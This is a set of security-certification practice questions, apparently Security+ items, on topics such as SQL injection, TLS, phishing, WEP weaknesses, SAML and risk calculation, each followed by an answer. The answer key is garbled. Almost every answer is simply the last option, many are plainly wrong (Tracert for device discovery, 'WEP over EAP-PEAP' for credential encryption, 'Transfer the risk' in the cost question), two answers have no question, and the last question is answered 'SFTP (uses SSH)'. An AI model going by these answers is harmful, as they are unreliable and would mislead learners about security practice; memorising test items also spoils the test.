A website form is used to register new students at a university. The form passes the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice? A. Cross-site request forgeries B. XSS attacks C. MITM attacks D. SQL injection
D. SQL injection
Which of the following is BEST used as a secure replacement for TELNET? A. HTTPS B. HMAC C. GPG D. SSH
D. SSH
A security administrator needs to determine which system a particular user is trying to log in to at various times of the day. Which of the following log types would the administrator check? A. Firewall B. Application C. IDS D. Security
D. Security
Sara, a company's security officer, often receives reports of unauthorized personnel having access codes to the cipher locks of secure areas in the building. Sara should immediately implement which of the following? A. Acceptable Use Policy B. Physical security controls C. Technical controls D. Security awareness training
D. Security awareness training
A user in the company is in charge of various financial roles but needs to prepare for an upcoming audit. They use the same account to access each financial system. Which of the following security controls will MOST likely be implemented within the company? A. Account lockout policy B. Account password enforcement C. Password complexity enabled D. Separation of duties
D. Separation of duties
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? A. Least privilege B. Job rotation C. Background checks D. Separation of duties
D. Separation of duties
B. zero-day attack
D. Site-to-site VPN
A Chief Executive Officer (CEO) of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has MOST likely occurred? A. Pharming B. Hoax C. Whaling D. Spear phishing
D. Spear phishing
A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? A. Shared accounts B. Preshared passwords C. Least privilege D. Sponsored guest
D. Sponsored guest
Which of the following can be used to mitigate risk if a mobile device is lost? A. Cable lock B. Transport encryption C. Voice encryption D. Strong passwords
D. Strong passwords
Which of the following concepts is BEST described as developing a new chain of command in the event of a contingency? A. Business continuity planning B. Continuity of operations C. Business impact analysis D. Succession planning
D. Succession planning
Which of the following is a difference between TFTP and FTP? A. TFTP is slower than FTP. B. TFTP is more secure than FTP. C. TFTP utilizes TCP and FTP uses UDP. D. TFTP utilizes UDP and FTP uses TCP.
D. TFTP utilizes UDP and FTP uses TCP.
A security engineer, Joe, has been asked to create a secure connection between his mail server and the mail server of a business partner. Which of the following protocols would be MOST appropriate? A. HTTPS B. SSH C. FTP D. TLS
D. TLS
Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement? A. PGP B. HTTPS C. WPA D. TLS
D. TLS
Which of the following transportation encryption protocols should be used to ensure maximum security between a web browser and a web server? A. SSLv2 B. SSHv1 C. RSA D. TLS
D. TLS
Which of the following would be used when a higher level of security is desired for encryption key storage? A. TACACS+ B. L2TP C. LDAP D. TPM
D. TPM
Which of the following staging environments is MOST likely to be a one-to-one mapping with the production environment and used for testing and validation prior to "go live"? A. Quality assurance B. Development C. Production D. Test
D. Test
On Monday, all company employees report being unable to connect to the corporate wireless network, which uses 802.1x with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the MOST likely cause for this issue? A. Too many incorrect authentication attempts have caused users to be temporarily disabled. B. The DNS server is overwhelmed with connections and is unable to respond to queries. C. The company IDS detected a wireless attack and disabled the wireless network. D. The Remote Authentication Dial-In User Service server certificate has expired.
D. The Remote Authentication Dial-In User Service server certificate has expired.
Which of the following BEST describes the weakness in WEP encryption? A. The initialization vector of WEP uses a crackable RC4 encryption algorithm. Once enough packets are captured, an XOR operation can be performed and the asymmetric keys can be derived. B. The WEP key is stored in plain text and split in portions across 224 packets of random data. Once enough packets are sniffed, the IV portion of the packets can be removed, leaving the plain text key. C. The WEP key uses a weak MD4 hashing algorithm. A simple rainbow table can be used to generate key possibilities due to MD4 collisions. D. The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused, it becomes easy to derive the remaining WEP key.
D. The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused, it becomes easy to derive the remaining WEP key.
A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above? A. The computer in question has not pulled the latest ACL policies for the firewall. B. The computer in question has not pulled the latest GPO policies from the management server. C. The computer in question has not pulled the latest antivirus definitions from the antivirus program. D. The computer in question has not pulled the latest application software updates.
D. The computer in question has not pulled the latest application software updates.
After an employee reported slow network speeds and application responsiveness, the help desk asked the company's security administrator to review the following firewall logs from the employee's computer:
2017-05-30 12:12:31 ALLOW TCP 192.168.1.236 192.168.1.1 30295 21
2017-05-30 12:12:32 ALLOW TCP 192.168.1.236 192.168.1.1 30296 22
2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30296 25
2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30297 80
2017-05-30 12:12:33 DROP TCP 84.176.55.103 192.168.1.236 10434 445
Which of the following can the security administrator infer and report to the help desk based on the above logs? A. The employee's computer is being actively scanned. B. The employee's computer is infected with a worm. C. The employee's computer firewall should be enabled. D. The computer's router is actively listening to unneeded services.
D. The computer's router is actively listening to unneeded services.
The payroll department has contacted the security team regarding an anomaly with amounts paid via the weekly payroll file. The security analyst is provided the following log from the server.
Time              Source IP      File Path               Action
1/1/16 9:24:10    10.10.24.156   C:\ACH\payrolll.xls     File created
1/1/16 3:15:23    172.14.89.12   C:\ACH\payrolll.xls     File transferred
1/7/16 9:24:10    10.10.24.156   C:\ACH\payrolll.xls     File created
1/7/16 3:15:23    172.14.89.12   C:\ACH\payrolll.xls     File transferred
1/14/16 9:24:10   10.10.24.156   C:\ACH\payrolll.xls     File created
1/14/16 9:51:34   10.10.24.156   C:\ACH\payrolll.xls     File modified
1/14/16 3:10:29   172.14.89.12   C:\ACH\payrolll.xls     Transfer failed
1/14/16 4:10:52   172.14.89.12   C:\ACH\payrolll.xls     File transferred
1/21/16 9:24:10   10.10.24.156   C:\ACH\payrolll.xls     File created
1/21/16 3:45:01   172.14.89.12   C:\ACH\payrolll.xls     File transferred
1/28/16 9:24:10   10.10.24.156   C:\ACH\payrolll.xls     File created
1/28/16 9:45:23   10.10.24.156   C:\ACH\payrolll.xls     File modified
1/28/16 10:23:52  17.23.45.29    C:\ACH\payrolll.xls     File modified
1/28/16 3:22:15   172.14.89.12   C:\ACH\payrolll.xls     File transferred
Which of the following is the MOST likely reason for the anomaly? A. The file was corrupted in transit. B. The file was transferred to the wrong destination. C. The connection was refused by the destination. D. The file was compromised before being sent.
D. The file was compromised before being sent.
A security engineer at a manufacturing company is implementing a third-party cloud application. Rather than create users manually in the application, the engineer decides to use the SAML protocol. Which of the following is being used for this implementation? A. The manufacturing company is the service provider, and the cloud company is the identity provider. B. The manufacturing company is the authorization provider, and the cloud company is the service provider. C. The manufacturing company is the identity provider, and the cloud company is the OAuth provider. D. The manufacturing company is the identity provider, and the cloud company is the service provider. E. The manufacturing company is the service provider, and the cloud company is the authorization provider.
D. The manufacturing company is the identity provider, and the cloud company is the service provider.
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO) A. Privileged-user certificates were used to scan the host B. Non-applicable plug-ins were selected in the scan policy C. The incorrect audit file was used D. The output of the report contains false positives E. The target host has been compromised
D. The output of the report contains false positives E. The target host has been compromised
In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence the decision? A. The scanner must be able to enumerate the host OS of the devices scanned B. The scanner must be able to footprint the network C. The scanner must be able to check for open ports with listening services D. The scanner must be able to audit file system permissions
D. The scanner must be able to audit file system permissions
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? A. The server will be unable to serve clients due to lack of bandwidth B. The server's firewall will be unable to effectively filter traffic due to the amount of data transmitted C. The server will crash when trying to reassemble all the fragmented packets D. The server will exhaust its memory maintaining half-open connections
D. The server will exhaust its memory maintaining half-open connections
A systems administrator is installing a new server in a large datacenter. Which of the following BEST describes the importance of properly positioning servers in the rack to maintain availability? A. To allow for visibility of the servers' status indicators B. To adhere to cable management standards C. To maximize the fire suppression system's efficiency D. To provide consistent air flow
D. To provide consistent air flow
LDAP and Kerberos are commonly used for which of the following? A. To perform queries on a directory service B. To store usernames and passwords for Federated Identity C. To sign SSL wildcard certificates for subdomains D. To utilize single sign-on capabilities
D. To utilize single sign-on capabilities
An organization has had problems keeping track of new devices being placed on the network. Which of the following tools should be used to identify where devices reside on the network? A. Tcpdump B. Nslookup C. Nmap D. Tracert
D. Tracert
Sara, the Chief Security Officer (CSO), has had four security breaches during the past two years. Each breach has cost the company $3,000. A third party vendor has offered to repair the security hole in the system for $25,000. The breached system is scheduled to be replaced in five years. Which of the following should Sara do to address the risk? A. Accept the risk saving $10,000. B. Ignore the risk saving $5,000. C. Mitigate the risk saving $10,000. D. Transfer the risk saving $5,000.
D. Transfer the risk saving $5,000.
A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming Internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space? A. Misconfigured devices B. Logs and events anomalies C. Authentication issues D. Unauthorized software
D. Unauthorized software
A security analyst, who is analyzing the security of the company's web server, receives the following output:
POST http://www.acme.com/AuthenticationServlet HTTP/1.1
HOST: www.acme.com
accept: text/xml, application/xml, application/xhtml + xml
Keep-Alive: 300
Connection: keep-alive
Referer: http//acme.com/index.jsp
Cookie: JSESSIONID+LvzZRJJXgwyWPWEQMhS49vtW1yJdvn78CG1Kp5jTvvChDyPknm4t !
Content-type: application/x-www-form-urlencoded
Content-length: 64
delegate_service=131&user=acme1&pass=test&submit=SUBMIT
Which of the following is the issue? A. Code signing B. Stored procedures C. Access violations D. Unencrypted credentials
D. Unencrypted credentials
A forensics expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to protect the chain of custody? A. Make a forensic copy B. Create a hash of the hard drive C. Recover the hard drive data D. Update the evidence log
D. Update the evidence log
An organization identifies a number of hosts making outbound connections to a known malicious IP over TCP port 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome? A. Use a protocol analyzer to reconstruct the data and implement a web proxy. B. Deploy a web proxy and then blacklist the IP on the firewall. C. Deploy a web proxy and implement IPS at the network edge. D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed? A. Removing the hard drive from its enclosure B. Using software to repeatedly rewrite over the disk space C. Using Blowfish encryption on the hard drives D. Using magnetic fields to erase the data
D. Using magnetic fields to erase the data
A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO? A. VPN B. PaaS C. IaaS D. VDI
D. VDI
Which of the following solutions provides the most flexibility when testing new security controls prior to implementation? A. Trusted OS B. Host software baselining C. OS hardening D. Virtualization
D. Virtualization
Jane, an individual, has recently been calling various financial offices pretending to be another person to gain financial information. Which of the following attacks is being described? A. Phishing B. Tailgating C. Pharming D. Vishing
D. Vishing
A security administrator must implement a network authentication solution which will ensure encryption of user credentials when users enter their username and password to authenticate to the network. Which of the following should the administrator implement? A. WPA2 over EAP-TTLS B. WPA-PSK C. WPA2 with WPS D. WEP over EAP-PEAP
D. WEP over EAP-PEAP
When developing an application, executing a preconfigured set of instructions is known as: A. a code library. B. code signing. C. a stored procedure. D. infrastructure as code.
D. infrastructure as code.
A security administrator is performing a test to determine if a server is vulnerable to compromise through unnecessary ports. Which of the following tools would assist the security administrator in gathering the required information? A. tcpdump B. netcat C. nslookup D. nmap E. dig
D. nmap
Hacktivists are most commonly motivated by: A. curiosity. B. notoriety. C. financial gain. D. political cause.
D. political cause.
After the integrity of a patch has been verified, but before it is deployed to production, it is important to: A. perform static analysis. B. reverse engineer it for embedded malware. C. run dynamic analysis on the executable. D. test it in a staging environment.
D. test it in a staging environment.
Access mechanisms to data on encrypted USB hard drives must be implemented correctly; otherwise: A. user accounts may be inadvertently locked out. B. data on the USB drive could be corrupted. C. data on the hard drive will be vulnerable to log analysis. D. the security controls on the USB drive can be bypassed.
D. the security controls on the USB drive can be bypassed.
A small company can only afford to buy an all-in-one wireless router/switch. The company has 3 wireless BYOD users and 2 web servers without wireless access. Which of the following should the company configure to protect the servers from the user devices? (Select TWO) A. Deny incoming connections to the outside router interface B. Change the default HTTP port C. Implement EAP-TLS to establish mutual authentication D. Disable the physical switch ports E. Create a server VLAN F. Create an ACL to access the server
E. Create a server VLAN F. Create an ACL to access the server
Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) A. Disable the compromised accounts B. Update WAF rules to block social networks C. Remove the compromised accounts with all AD groups D. Change the compromised accounts' passwords E. Disable the open relay on the email server F. Enable sender policy framework
E. Disable the open relay on the email server F. Enable sender policy framework
Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? A. Retinal scan B. Passphrase C. Token fob D. Security question
SFTP (uses SSH)